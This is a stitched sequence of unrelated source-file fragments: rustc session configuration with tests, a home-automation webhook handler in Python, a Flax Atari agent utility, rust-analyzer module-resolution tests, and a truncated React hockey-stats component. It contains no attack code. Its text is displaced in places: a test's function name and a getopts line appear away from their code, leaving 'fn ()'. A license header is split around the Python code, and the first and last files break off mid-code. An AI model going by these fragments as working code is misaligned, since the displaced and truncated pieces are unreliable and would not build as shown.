Whether this is a feature-staged build, i.e. on the beta or stable channel let disable_unstable_features = option_env!("CFG_DISABLE_UNSTABLE_FEATURES").is_some(); // The secret key needed to get through the rustc build itself by // subverting the unstable features lints let bootstrap_secret_key = option_env!("CFG_BOOTSTRAP_KEY"); // The matching key to the above, only known by the build system let bootstrap_provided_key = env::var("RUSTC_BOOTSTRAP_KEY").ok(); match (disable_unstable_features, bootstrap_secret_key, bootstrap_provided_key) { (_, Some(ref s), Some(ref p)) if s == p => UnstableFeatures::Cheat, (true, _, _) => UnstableFeatures::Disallow, (false, _, _) => UnstableFeatures::Allow } } pub fn parse_crate_types_from_list(list_list: Vec<String>) -> Result<Vec<CrateType>, String> { let mut crate_types: Vec<CrateType> = Vec::new(); for unparsed_crate_type in &list_list { for part in unparsed_crate_type.split(',') { let new_part = match part { "lib" => default_lib_output(), "rlib" => CrateTypeRlib, "staticlib" => CrateTypeStaticlib, "dylib" => CrateTypeDylib, "bin" => CrateTypeExecutable, _ => { return Err(format!("unknown crate type: `{}`", part)); } }; if !crate_types.contains(&new_part) { crate_types.push(new_part) } } } return Ok(crate_types); } impl fmt::Display for CrateType { fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { match *self { CrateTypeExecutable => "bin".fmt(f), CrateTypeDylib => "dylib".fmt(f), CrateTypeRlib => "rlib".fmt(f), CrateTypeStaticlib => "staticlib".fmt(f) } } } #[cfg(test)] mod tests { use session::config::{build_configuration, optgroups, build_session_options}; use session::build_session; use getopts::getopts; use syntax::attr; use syntax::attr::AttrMetaMethods; use syntax::diagnostics; // When the user supplies --test we should implicitly supply --cfg test #[test] fn test_switch_implies_cfg_test() { let matches = &match getopts(&["--test".to_string()], &optgroups()) { Ok(m) => m, Err(f) => panic!("test_switch_implies_cfg_test: {}", f) }; let registry = diagnostics::registry::Registry::new(&[]); let sessopts = build_session_options(matches); let sess = build_session(sessopts, None, registry); let cfg = build_configuration(&sess); assert!((attr::contains_name(&cfg[..], "test"))); } // When the user supplies --test and --cfg test, don't implicitly add // another --cfg test #[test] fn test_switch_implies_cfg_test_unless_cfg_test() { let matches = &match getopts(&["--test".to_string(), "--cfg=test".to_string()], &optgroups()) { Ok(m) => m, Err(f) => { panic!("test_switch_implies_cfg_test_unless_cfg_test: {}", f) } }; let registry = diagnostics::registry::Registry::new(&[]); let sessopts = build_session_options(matches); let sess = build_session(sessopts, None, registry); let cfg = build_configuration(&sess); let mut test_items = cfg.iter().filter(|m| m.name() == "test"); assert!(test_items.next().is_some()); assert!(test_items.next().is_none()); } #[test] fn test_can_print_warnings() { { let matches = getopts(&[ "-Awarnings".to_string() ], &optgroups()).unwrap(); let registry = diagnostics::registry::Registry::new(&[]); let sessopts = build_session_options(&matches); let sess = build_session(sessopts, None, registry); assert!(!sess.can_print_warnings); } { let matches = getopts(&[ "-Awarnings".to_string(), "-Dwarnings".to_string() ], &optgroups()).unwrap(); let registry = diagnostics::registry::Registry::new(&[]); let sessopts = build_session_options(&matches); let sess = build_session(sessopts, None, registry); assert!(sess.can_print_warnings); } { let matches = getopts(&[ "-Adead_code".to_string() ], &optgroups()).unwrap(); let registry = diagnostics::registry::Registry::new(&[]); let sessopts = build_session_options(&matches); let sess = build_session(sessopts, None, registry); assert!(sess.can_print_warnings); } } }
{ unstable(getopts::optopt(a, b, c, d)) }
webhook.py
"""Webhook handlers for mobile_app.""" from functools import wraps import logging import secrets from aiohttp.web import HTTPBadRequest, Request, Response, json_response from nacl.secret import SecretBox import voluptuous as vol from openpeerpower.components.binary_sensor import ( DEVICE_CLASSES as BINARY_SENSOR_CLASSES, ) from openpeerpower.components.device_tracker import ( ATTR_BATTERY, ATTR_GPS, ATTR_GPS_ACCURACY, ATTR_LOCATION_NAME, ) from openpeerpower.components.frontend import MANIFEST_JSON from openpeerpower.components.sensor import DEVICE_CLASSES as SENSOR_CLASSES from openpeerpower.components.zone.const import DOMAIN as ZONE_DOMAIN from openpeerpower.const import ( ATTR_DOMAIN, ATTR_SERVICE, ATTR_SERVICE_DATA, CONF_WEBHOOK_ID, HTTP_BAD_REQUEST, HTTP_CREATED, ) from openpeerpower.core import EventOrigin from openpeerpower.exceptions import OpenPeerPowerError, ServiceNotFound, TemplateError from openpeerpower.helpers import config_validation as cv, device_registry as dr from openpeerpower.helpers.dispatcher import async_dispatcher_send from openpeerpower.helpers.template import attach from openpeerpower.helpers.typing import OpenPeerPowerType from openpeerpower.util.decorator import Registry from .const import ( ATTR_ALTITUDE, ATTR_APP_DATA, ATTR_APP_VERSION, ATTR_COURSE, ATTR_DEVICE_ID, ATTR_DEVICE_NAME, ATTR_EVENT_DATA, ATTR_EVENT_TYPE, ATTR_MANUFACTURER, ATTR_MODEL, ATTR_OS_VERSION, ATTR_SENSOR_ATTRIBUTES, ATTR_SENSOR_DEVICE_CLASS, ATTR_SENSOR_ICON, ATTR_SENSOR_NAME, ATTR_SENSOR_STATE, ATTR_SENSOR_TYPE, ATTR_SENSOR_TYPE_BINARY_SENSOR, ATTR_SENSOR_TYPE_SENSOR, ATTR_SENSOR_UNIQUE_ID, ATTR_SENSOR_UOM, ATTR_SPEED, ATTR_SUPPORTS_ENCRYPTION, ATTR_TEMPLATE, ATTR_TEMPLATE_VARIABLES, ATTR_VERTICAL_ACCURACY, ATTR_WEBHOOK_DATA, ATTR_WEBHOOK_ENCRYPTED, ATTR_WEBHOOK_ENCRYPTED_DATA, ATTR_WEBHOOK_TYPE, CONF_CLOUDHOOK_URL, CONF_REMOTE_UI_URL, CONF_SECRET, DATA_CONFIG_ENTRIES, DATA_DELETED_IDS, DATA_STORE, DOMAIN, ERR_ENCRYPTION_ALREADY_ENABLED, ERR_ENCRYPTION_NOT_AVAILABLE, ERR_ENCRYPTION_REQUIRED, ERR_SENSOR_DUPLICATE_UNIQUE_ID, ERR_SENSOR_NOT_REGISTERED, SIGNAL_LOCATION_UPDATE, SIGNAL_SENSOR_UPDATE, ) from .helpers import ( _decrypt_payload, empty_okay_response, error_response, registration_context, safe_registration, savable_state, supports_encryption, webhook_response, ) _LOGGER = logging.getLogger(__name__) WEBHOOK_COMMANDS = Registry() COMBINED_CLASSES = set(BINARY_SENSOR_CLASSES + SENSOR_CLASSES) SENSOR_TYPES = [ATTR_SENSOR_TYPE_BINARY_SENSOR, ATTR_SENSOR_TYPE_SENSOR] WEBHOOK_PAYLOAD_SCHEMA = vol.Schema( { vol.Required(ATTR_WEBHOOK_TYPE): cv.string, vol.Required(ATTR_WEBHOOK_DATA, default={}): vol.Any(dict, list), vol.Optional(ATTR_WEBHOOK_ENCRYPTED, default=False): cv.boolean, vol.Optional(ATTR_WEBHOOK_ENCRYPTED_DATA): cv.string, } ) def validate_schema(schema): """Decorate a webhook function with a schema.""" if isinstance(schema, dict): schema = vol.Schema(schema) def wrapper(func): """Wrap function so we validate schema.""" @wraps(func) async def validate_and_run(opp, config_entry, data): """Validate input and call handler.""" try: data = schema(data) except vol.Invalid as ex: err = vol.humanize.humanize_error(data, ex) _LOGGER.error("Received invalid webhook payload: %s", err) return empty_okay_response() return await func(opp, config_entry, data) return validate_and_run return wrapper async def handle_webhook( opp: OpenPeerPowerType, webhook_id: str, request: Request ) -> Response: """Handle webhook callback.""" if webhook_id in opp.data[DOMAIN][DATA_DELETED_IDS]: return Response(status=410) config_entry = opp.data[DOMAIN][DATA_CONFIG_ENTRIES][webhook_id] try: req_data = await request.json() except ValueError: _LOGGER.warning("Received invalid JSON from mobile_app") return empty_okay_response(status=HTTP_BAD_REQUEST) if ( ATTR_WEBHOOK_ENCRYPTED not in req_data and config_entry.data[ATTR_SUPPORTS_ENCRYPTION] ): _LOGGER.warning( "Refusing to accept unencrypted webhook from %s", config_entry.data[ATTR_DEVICE_NAME], ) return error_response(ERR_ENCRYPTION_REQUIRED, "Encryption required") try: req_data = WEBHOOK_PAYLOAD_SCHEMA(req_data) except vol.Invalid as ex: err = vol.humanize.humanize_error(req_data, ex) _LOGGER.error("Received invalid webhook payload: %s", err) return empty_okay_response() webhook_type = req_data[ATTR_WEBHOOK_TYPE] webhook_payload = req_data.get(ATTR_WEBHOOK_DATA, {}) if req_data[ATTR_WEBHOOK_ENCRYPTED]: enc_data = req_data[ATTR_WEBHOOK_ENCRYPTED_DATA] webhook_payload = _decrypt_payload(config_entry.data[CONF_SECRET], enc_data) if webhook_type not in WEBHOOK_COMMANDS: _LOGGER.error("Received invalid webhook type: %s", webhook_type) return empty_okay_response() _LOGGER.debug( "Received webhook payload for type %s: %s", webhook_type, webhook_payload ) return await WEBHOOK_COMMANDS[webhook_type](opp, config_entry, webhook_payload) @WEBHOOK_COMMANDS.register("call_service") @validate_schema( { vol.Required(ATTR_DOMAIN): cv.string, vol.Required(ATTR_SERVICE): cv.string, vol.Optional(ATTR_SERVICE_DATA, default={}): dict, } ) async def webhook_call_service(opp, config_entry, data): """Handle a call service webhook.""" try: await opp.services.async_call( data[ATTR_DOMAIN], data[ATTR_SERVICE], data[ATTR_SERVICE_DATA], blocking=True, context=registration_context(config_entry.data), ) except (vol.Invalid, ServiceNotFound, Exception) as ex: _LOGGER.error( "Error when calling service during mobile_app " "webhook (device name: %s): %s", config_entry.data[ATTR_DEVICE_NAME], ex, ) raise HTTPBadRequest() return empty_okay_response() @WEBHOOK_COMMANDS.register("fire_event") @validate_schema( { vol.Required(ATTR_EVENT_TYPE): cv.string, vol.Optional(ATTR_EVENT_DATA, default={}): dict, } ) async def webhook_fire_event(opp, config_entry, data): """Handle a fire event webhook.""" event_type = data[ATTR_EVENT_TYPE] opp.bus.async_fire( event_type, data[ATTR_EVENT_DATA], EventOrigin.remote, context=registration_context(config_entry.data), ) return empty_okay_response() @WEBHOOK_COMMANDS.register("render_template") @validate_schema( { str: { vol.Required(ATTR_TEMPLATE): cv.template, vol.Optional(ATTR_TEMPLATE_VARIABLES, default={}): dict, } } ) async def webhook_render_template(opp, config_entry, data): """Handle a render template webhook.""" resp = {} for key, item in data.items(): try: tpl = item[ATTR_TEMPLATE] attach(opp, tpl) resp[key] = tpl.async_render(item.get(ATTR_TEMPLATE_VARIABLES)) except TemplateError as ex: resp[key] = {"error": str(ex)} return webhook_response(resp, registration=config_entry.data) @WEBHOOK_COMMANDS.register("update_location") @validate_schema( { vol.Optional(ATTR_LOCATION_NAME): cv.string, vol.Required(ATTR_GPS): cv.gps, vol.Required(ATTR_GPS_ACCURACY): cv.positive_int, vol.Optional(ATTR_BATTERY): cv.positive_int, vol.Optional(ATTR_SPEED): cv.positive_int, vol.Optional(ATTR_ALTITUDE): vol.Coerce(float), vol.Optional(ATTR_COURSE): cv.positive_int, vol.Optional(ATTR_VERTICAL_ACCURACY): cv.positive_int, }
) async def webhook_update_location(opp, config_entry, data): """Handle an update location webhook.""" opp.helpers.dispatcher.async_dispatcher_send( SIGNAL_LOCATION_UPDATE.format(config_entry.entry_id), data ) return empty_okay_response() @WEBHOOK_COMMANDS.register("update_registration") @validate_schema( { vol.Optional(ATTR_APP_DATA, default={}): dict, vol.Required(ATTR_APP_VERSION): cv.string, vol.Required(ATTR_DEVICE_NAME): cv.string, vol.Required(ATTR_MANUFACTURER): cv.string, vol.Required(ATTR_MODEL): cv.string, vol.Optional(ATTR_OS_VERSION): cv.string, } ) async def webhook_update_registration(opp, config_entry, data): """Handle an update registration webhook.""" new_registration = {**config_entry.data, **data} device_registry = await dr.async_get_registry(opp) device_registry.async_get_or_create( config_entry_id=config_entry.entry_id, identifiers={(DOMAIN, config_entry.data[ATTR_DEVICE_ID])}, manufacturer=new_registration[ATTR_MANUFACTURER], model=new_registration[ATTR_MODEL], name=new_registration[ATTR_DEVICE_NAME], sw_version=new_registration[ATTR_OS_VERSION], ) opp.config_entries.async_update_entry(config_entry, data=new_registration) return webhook_response( safe_registration(new_registration), registration=new_registration, ) @WEBHOOK_COMMANDS.register("enable_encryption") async def webhook_enable_encryption(opp, config_entry, data): """Handle a encryption enable webhook.""" if config_entry.data[ATTR_SUPPORTS_ENCRYPTION]: _LOGGER.warning( "Refusing to enable encryption for %s because it is already enabled!", config_entry.data[ATTR_DEVICE_NAME], ) return error_response( ERR_ENCRYPTION_ALREADY_ENABLED, "Encryption already enabled" ) if not supports_encryption(): _LOGGER.warning( "Unable to enable encryption for %s because libsodium is unavailable!", config_entry.data[ATTR_DEVICE_NAME], ) return error_response(ERR_ENCRYPTION_NOT_AVAILABLE, "Encryption is unavailable") secret = secrets.token_hex(SecretBox.KEY_SIZE) data = {**config_entry.data, ATTR_SUPPORTS_ENCRYPTION: True, CONF_SECRET: secret} opp.config_entries.async_update_entry(config_entry, data=data) return json_response({"secret": secret}) @WEBHOOK_COMMANDS.register("register_sensor") @validate_schema( { vol.Optional(ATTR_SENSOR_ATTRIBUTES, default={}): dict, vol.Optional(ATTR_SENSOR_DEVICE_CLASS): vol.All( vol.Lower, vol.In(COMBINED_CLASSES) ), vol.Required(ATTR_SENSOR_NAME): cv.string, vol.Required(ATTR_SENSOR_TYPE): vol.In(SENSOR_TYPES), vol.Required(ATTR_SENSOR_UNIQUE_ID): cv.string, vol.Optional(ATTR_SENSOR_UOM): cv.string, vol.Required(ATTR_SENSOR_STATE): vol.Any(bool, str, int, float), vol.Optional(ATTR_SENSOR_ICON, default="mdi:cellphone"): cv.icon, } ) async def webhook_register_sensor(opp, config_entry, data): """Handle a register sensor webhook.""" entity_type = data[ATTR_SENSOR_TYPE] unique_id = data[ATTR_SENSOR_UNIQUE_ID] unique_store_key = f"{config_entry.data[CONF_WEBHOOK_ID]}_{unique_id}" if unique_store_key in opp.data[DOMAIN][entity_type]: _LOGGER.error("Refusing to re-register existing sensor %s!", unique_id) return error_response( ERR_SENSOR_DUPLICATE_UNIQUE_ID, f"{entity_type} {unique_id} already exists!", status=409, ) data[CONF_WEBHOOK_ID] = config_entry.data[CONF_WEBHOOK_ID] opp.data[DOMAIN][entity_type][unique_store_key] = data try: await opp.data[DOMAIN][DATA_STORE].async_save(savable_state(opp)) except OpenPeerPowerError as ex: _LOGGER.error("Error registering sensor: %s", ex) return empty_okay_response() register_signal = "{}_{}_register".format(DOMAIN, data[ATTR_SENSOR_TYPE]) async_dispatcher_send(opp, register_signal, data) return webhook_response( {"success": True}, registration=config_entry.data, status=HTTP_CREATED, ) @WEBHOOK_COMMANDS.register("update_sensor_states") @validate_schema( vol.All( cv.ensure_list, [ vol.Schema( { vol.Optional(ATTR_SENSOR_ATTRIBUTES, default={}): dict, vol.Optional(ATTR_SENSOR_ICON, default="mdi:cellphone"): cv.icon, vol.Required(ATTR_SENSOR_STATE): vol.Any(bool, str, int, float), vol.Required(ATTR_SENSOR_TYPE): vol.In(SENSOR_TYPES), vol.Required(ATTR_SENSOR_UNIQUE_ID): cv.string, } ) ], ) ) async def webhook_update_sensor_states(opp, config_entry, data): """Handle an update sensor states webhook.""" resp = {} for sensor in data: entity_type = sensor[ATTR_SENSOR_TYPE] unique_id = sensor[ATTR_SENSOR_UNIQUE_ID] unique_store_key = f"{config_entry.data[CONF_WEBHOOK_ID]}_{unique_id}" if unique_store_key not in opp.data[DOMAIN][entity_type]: _LOGGER.error( "Refusing to update non-registered sensor: %s", unique_store_key ) err_msg = f"{entity_type} {unique_id} is not registered" resp[unique_id] = { "success": False, "error": {"code": ERR_SENSOR_NOT_REGISTERED, "message": err_msg}, } continue entry = opp.data[DOMAIN][entity_type][unique_store_key] new_state = {**entry, **sensor} opp.data[DOMAIN][entity_type][unique_store_key] = new_state safe = savable_state(opp) try: await opp.data[DOMAIN][DATA_STORE].async_save(safe) except OpenPeerPowerError as ex: _LOGGER.error("Error updating mobile_app registration: %s", ex) return empty_okay_response() async_dispatcher_send(opp, SIGNAL_SENSOR_UPDATE, new_state) resp[unique_id] = {"success": True} return webhook_response(resp, registration=config_entry.data) @WEBHOOK_COMMANDS.register("get_zones") async def webhook_get_zones(opp, config_entry, data): """Handle a get zones webhook.""" zones = [ opp.states.get(entity_id) for entity_id in sorted(opp.states.async_entity_ids(ZONE_DOMAIN)) ] return webhook_response(zones, registration=config_entry.data) @WEBHOOK_COMMANDS.register("get_config") async def webhook_get_config(opp, config_entry, data): """Handle a get config webhook.""" opp_config = opp.config.as_dict() resp = { "latitude": opp_config["latitude"], "longitude": opp_config["longitude"], "elevation": opp_config["elevation"], "unit_system": opp_config["unit_system"], "location_name": opp_config["location_name"], "time_zone": opp_config["time_zone"], "components": opp_config["components"], "version": opp_config["version"], "theme_color": MANIFEST_JSON["theme_color"], } if CONF_CLOUDHOOK_URL in config_entry.data: resp[CONF_CLOUDHOOK_URL] = config_entry.data[CONF_CLOUDHOOK_URL] try: resp[CONF_REMOTE_UI_URL] = opp.components.cloud.async_remote_ui_url() except opp.components.cloud.CloudNotAvailable: pass return webhook_response(resp, registration=config_entry.data)
agent.py
# Copyright 2021 The Flax Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and
import functools import multiprocessing import collections from typing import Any, Callable import numpy as np import jax import flax import env_utils @functools.partial(jax.jit, static_argnums=0) def policy_action( apply_fn: Callable[..., Any], params: flax.core.frozen_dict.FrozenDict, state: np.ndarray): """Forward pass of the network. Args: params: the parameters of the actor-critic model module: the actor-critic model state: the input for the forward pass Returns: out: a tuple (log_probabilities, values) """ out = apply_fn({'params': params}, state) return out ExpTuple = collections.namedtuple( 'ExpTuple', ['state', 'action', 'reward', 'value', 'log_prob', 'done']) class RemoteSimulator: """Wrap functionality for an agent emulating Atari in a separate process. An object of this class is created for every agent. """ def __init__(self, game: str): """Start the remote process and create Pipe() to communicate with it.""" parent_conn, child_conn = multiprocessing.Pipe() self.proc = multiprocessing.Process( target=rcv_action_send_exp, args=(child_conn, game)) self.proc.daemon = True self.conn = parent_conn self.proc.start() def rcv_action_send_exp(conn, game: str): """Run the remote agents. Receive action from the main learner, perform one step of simulation and send back collected experience. """ env = env_utils.create_env(game, clip_rewards=True) while True: obs = env.reset() done = False # Observations fetched from Atari env need additional batch dimension. state = obs[None, ...] while not done: conn.send(state) action = conn.recv() obs, reward, done, _ = env.step(action) next_state = obs[None, ...] if not done else None experience = (state, action, reward, done) conn.send(experience) if done: break state = next_state
# limitations under the License. """Agent utilities, incl. choosing the move and running in separate process."""
mod_resolution.rs
use super::*; #[test] fn name_res_works_for_broken_modules() { cov_mark::check!(name_res_works_for_broken_modules); check( r" //- /lib.rs mod foo // no `;`, no body use self::foo::Baz; //- /foo/mod.rs pub mod bar; pub use self::bar::Baz; //- /foo/bar.rs pub struct Baz; ", expect![[r#" crate Baz: _ foo: t crate::foo "#]], ); } #[test] fn nested_module_resolution() { check( r#" //- /lib.rs mod n1; //- /n1.rs mod n2; //- /n1/n2.rs struct X; "#, expect![[r#" crate n1: t crate::n1 n2: t crate::n1::n2 X: t v "#]], ); } #[test] fn nested_module_resolution_2() { check( r#" //- /lib.rs mod prelude; mod iter; //- /prelude.rs pub use crate::iter::Iterator; //- /iter.rs pub use self::traits::Iterator; mod traits; //- /iter/traits.rs pub use self::iterator::Iterator; mod iterator; //- /iter/traits/iterator.rs pub trait Iterator; "#, expect![[r#" crate iter: t prelude: t crate::iter Iterator: t traits: t crate::iter::traits Iterator: t iterator: t crate::iter::traits::iterator Iterator: t crate::prelude Iterator: t "#]], ); } #[test] fn module_resolution_works_for_non_standard_filenames() { check( r#" //- /my_library.rs crate:my_library mod foo; use self::foo::Bar; //- /foo/mod.rs pub struct Bar; "#, expect![[r#" crate Bar: t v foo: t crate::foo Bar: t v "#]], ); } #[test] fn module_resolution_works_for_raw_modules() { check( r#" //- /lib.rs mod r#async; use self::r#async::Bar; //- /async.rs pub struct Bar; "#, expect![[r#" crate Bar: t v async: t crate::async Bar: t v "#]], ); } #[test] fn module_resolution_decl_path() { check( r#" //- /lib.rs #[path = "bar/baz/foo.rs"] mod foo; use self::foo::Bar; //- /bar/baz/foo.rs pub struct Bar; "#, expect![[r#" crate Bar: t v foo: t crate::foo Bar: t v "#]], ); } #[test] fn module_resolution_module_with_path_in_mod_rs() { check( r#" //- /main.rs mod foo; //- /foo/mod.rs #[path = "baz.rs"] pub mod bar; use self::bar::Baz; //- /foo/baz.rs pub struct Baz; "#, expect![[r#" crate foo: t crate::foo Baz: t v bar: t crate::foo::bar Baz: t v "#]], ); } #[test] fn module_resolution_module_with_path_non_crate_root() { check( r#" //- /main.rs mod foo; //- /foo.rs #[path = "baz.rs"] pub mod bar; use self::bar::Baz; //- /baz.rs pub struct Baz; "#, expect![[r#" crate foo: t crate::foo Baz: t v bar: t crate::foo::bar Baz: t v "#]], ); } #[test] fn module_resolution_module_decl_path_super() { check( r#" //- /main.rs #[path = "bar/baz/module.rs"] mod foo; pub struct Baz; //- /bar/baz/module.rs use super::Baz; "#, expect![[r#" crate Baz: t v foo: t crate::foo Baz: t v "#]], ); } #[test] fn module_resolution_explicit_path_mod_rs() { check( r#" //- /main.rs #[path = "module/mod.rs"] mod foo; //- /module/mod.rs pub struct Baz; "#, expect![[r#" crate foo: t crate::foo Baz: t v "#]], ); } #[test] fn module_resolution_relative_path() { check( r#" //- /main.rs mod foo; //- /foo.rs #[path = "./sub.rs"] pub mod foo_bar; //- /sub.rs pub struct Baz; "#, expect![[r#" crate foo: t crate::foo foo_bar: t crate::foo::foo_bar Baz: t v "#]], ); } #[test] fn module_resolution_relative_path_2() { check( r#" //- /main.rs mod foo; //- /foo/mod.rs #[path="../sub.rs"] pub mod foo_bar; //- /sub.rs pub struct Baz; "#, expect![[r#" crate foo: t crate::foo foo_bar: t crate::foo::foo_bar Baz: t v "#]], ); } #[test] fn module_resolution_relative_path_outside_root() { check( r#" //- /a/b/c/d/e/main.rs crate:main #[path="../../../../../outside.rs"] mod foo; //- /outside.rs mod bar; //- /bar.rs pub struct Baz; "#, expect![[r#" crate foo: t crate::foo bar: t crate::foo::bar Baz: t v "#]], ); } #[test] fn module_resolution_explicit_path_mod_rs_2() { check( r#" //- /main.rs #[path = "module/bar/mod.rs"] mod foo; //- /module/bar/mod.rs pub struct Baz; "#, expect![[r#" crate foo: t crate::foo Baz: t v "#]], ); } #[test] fn module_resolution_explicit_path_mod_rs_with_win_separator() { check( r#" //- /main.rs #[path = r"module\bar\mod.rs"] mod foo; //- /module/bar/mod.rs pub struct Baz; "#, expect![[r#" crate foo: t crate::foo Baz: t v "#]], ); } #[test] fn module_resolution_decl_inside_inline_module_with_path_attribute() { check( r#" //- /main.rs #[path = "models"] mod foo { mod bar; } //- /models/bar.rs pub struct Baz; "#, expect![[r#" crate foo: t crate::foo bar: t crate::foo::bar Baz: t v "#]], ); } #[test] fn module_resolution_decl_inside_inline_module() { check( r#" //- /main.rs mod foo { mod bar; } //- /foo/bar.rs pub struct Baz; "#, expect![[r#" crate foo: t crate::foo bar: t crate::foo::bar Baz: t v "#]], ); } #[test] fn module_resolution_decl_inside_inline_module_2_with_path_attribute() { check( r#" //- /main.rs #[path = "models/db"] mod foo { mod bar; } //- /models/db/bar.rs pub struct Baz; "#, expect![[r#" crate foo: t crate::foo bar: t crate::foo::bar Baz: t v "#]], ); } #[test] fn module_resolution_decl_inside_inline_module_3() { check( r#" //- /main.rs #[path = "models/db"] mod foo { #[path = "users.rs"] mod bar; } //- /models/db/users.rs pub struct Baz; "#, expect![[r#" crate foo: t crate::foo bar: t crate::foo::bar Baz: t v "#]], ); } #[test] fn module_resolution_decl_inside_inline_module_empty_path() { check( r#" //- /main.rs #[path = ""] mod foo { #[path = "users.rs"] mod bar; } //- /users.rs pub struct Baz; "#, expect![[r#" crate foo: t crate::foo bar: t crate::foo::bar Baz: t v "#]], ); } #[test] fn module_resolution_decl_empty_path() { check( r#" //- /main.rs #[path = ""] // Should try to read `/` (a directory) mod foo; //- /foo.rs pub struct Baz; "#, expect![[r#" crate foo: t crate::foo "#]], ); } #[test] fn module_resolution_decl_inside_inline_module_relative_path() { check( r#" //- /main.rs #[path = "./models"] mod foo { mod bar; } //- /models/bar.rs pub struct Baz; "#, expect![[r#" crate foo: t crate::foo bar: t crate::foo::bar Baz: t v "#]], ); } #[test] fn module_resolution_decl_inside_inline_module_in_crate_root() { check( r#" //- /main.rs mod foo { #[path = "baz.rs"] mod bar; } use self::foo::bar::Baz; //- /foo/baz.rs pub struct Baz; "#, expect![[r#" crate Baz: t v foo: t crate::foo bar: t crate::foo::bar Baz: t v "#]], ); } #[test] fn module_resolution_decl_inside_inline_module_in_mod_rs() { check( r#" //- /main.rs mod foo; //- /foo/mod.rs mod bar { #[path = "qwe.rs"] pub mod baz; } use self::bar::baz::Baz; //- /foo/bar/qwe.rs pub struct Baz; "#, expect![[r#" crate foo: t crate::foo Baz: t v bar: t crate::foo::bar baz: t crate::foo::bar::baz Baz: t v "#]], ); } #[test] fn module_resolution_decl_inside_inline_module_in_non_crate_root() { check( r#" //- /main.rs mod foo; //- /foo.rs mod bar { #[path = "qwe.rs"] pub mod baz; } use self::bar::baz::Baz; //- /foo/bar/qwe.rs pub struct Baz; "#, expect![[r#" crate foo: t crate::foo Baz: t v bar: t crate::foo::bar baz: t crate::foo::bar::baz Baz: t v "#]], ); } #[test] fn module_resolution_decl_inside_inline_module_in_non_crate_root_2() { check( r#" //- /main.rs mod foo; //- /foo.rs #[path = "bar"] mod bar { pub mod baz; } use self::bar::baz::Baz; //- /bar/baz.rs pub struct Baz; "#, expect![[r#" crate foo: t crate::foo Baz: t v bar: t crate::foo::bar baz: t crate::foo::bar::baz Baz: t v "#]], ); } #[test] fn
() { check( r#" //- /main.rs #[path="module/m2.rs"] mod module; //- /module/m2.rs pub mod submod; //- /module/submod.rs pub struct Baz; "#, expect![[r#" crate module: t crate::module submod: t crate::module::submod Baz: t v "#]], ); } #[test] fn nested_out_of_line_module() { check( r#" //- /lib.rs mod a { mod b { mod c; } } //- /a/b/c.rs struct X; "#, expect![[r#" crate a: t crate::a b: t crate::a::b c: t crate::a::b::c X: t v "#]], ); } #[test] fn nested_out_of_line_module_with_path() { check( r#" //- /lib.rs mod a { #[path = "d/e"] mod b { mod c; } } //- /a/d/e/c.rs struct X; "#, expect![[r#" crate a: t crate::a b: t crate::a::b c: t crate::a::b::c X: t v "#]], ); } #[test] fn circular_mods() { cov_mark::check!(circular_mods); compute_crate_def_map( r#" //- /lib.rs mod foo; //- /foo.rs #[path = "./foo.rs"] mod foo; "#, ); compute_crate_def_map( r#" //- /lib.rs mod foo; //- /foo.rs #[path = "./bar.rs"] mod bar; //- /bar.rs #[path = "./foo.rs"] mod foo; "#, ); } #[test] fn abs_path_ignores_local() { check( r#" //- /main.rs crate:main deps:core pub use ::core::hash::Hash; pub mod core {} //- /lib.rs crate:core pub mod hash { pub trait Hash {} } "#, expect![[r#" crate Hash: t core: t crate::core "#]], ); } #[test] fn cfg_in_module_file() { // Inner `#![cfg]` in a module file makes the whole module disappear. check( r#" //- /main.rs mod module; //- /module.rs #![cfg(NEVER)] struct AlsoShoulntAppear; "#, expect![[r#" crate "#]], ) }
module_resolution_decl_inside_module_in_non_crate_root_2
Compare.tsx
import * as React from 'react'; import { TeamLogo } from '../../../../hockey/TeamLogo' type Props = { //@TODO all english, and color logic homeplatz: number, awayplatz: number, homepunkte: number, awaypunkte: number, hometore: number, homegegentore: number, awaytore: number, awaygegentore: number, homescorer: string, homescorerpunkte: number, awayscorer: string, awayscorerpunkte: number homegefahr: string, homegefahrpunkte: number, awaygefahr: string, awaygefahrpunkte: number, homebadboy: string, homebadboypunkte: number, awaybadboy: string, awaybadboypunkte: number, hometeam: Club, awayteam: Club } class Compare extends React.Component<Props> { getColor(a: number, b: number, inverse = false): string { let isBetterA = (a >= b); if (inverse) isBetterA = !isBetterA; return isBetterA ? 'green' : 'red'; } render() { return ( <section className="screen-compare present" data-fullscreen=""> <div className="bg-green-light screen-title"><h4>Teamvergleich</h4></div> <table> <tbody> <tr> <td align="right"><span className={`bg-${ this.getColor(this.props.homeplatz, this.props.awayplatz, true) }-light`}>{ this.props.homeplatz }</span></td> <td className="middle" align="center">Tabellenplatz</td> <td><span className={`bg-${ this.getColor(this.props.awayplatz, this.props.homeplatz, true) }-light`}>{ this.props.awayplatz }</span></td> </tr> <tr> <td align="right"><span className={`bg-${ this.getColor(this.props.homepunkte, this.props.awaypunkte) }-light`}>{ this.props.homepunkte }</span></td> <td className="middle" align="center">Punkte</td> <td><span className={`bg-${ this.getColor(this.props.awaypunkte, this.props.homepunkte) }-light`}>{ this.props.awaypunkte }</span></td> </tr> <tr> <td align="right"><span className={`bg-${ this.getColor(this.props.hometore - this.props.homegegentore, this.props.awaytore - this.props.awaygegentore) }-light`}>{ this.props.hometore }:{ this.props.homegegentore }</span></td>
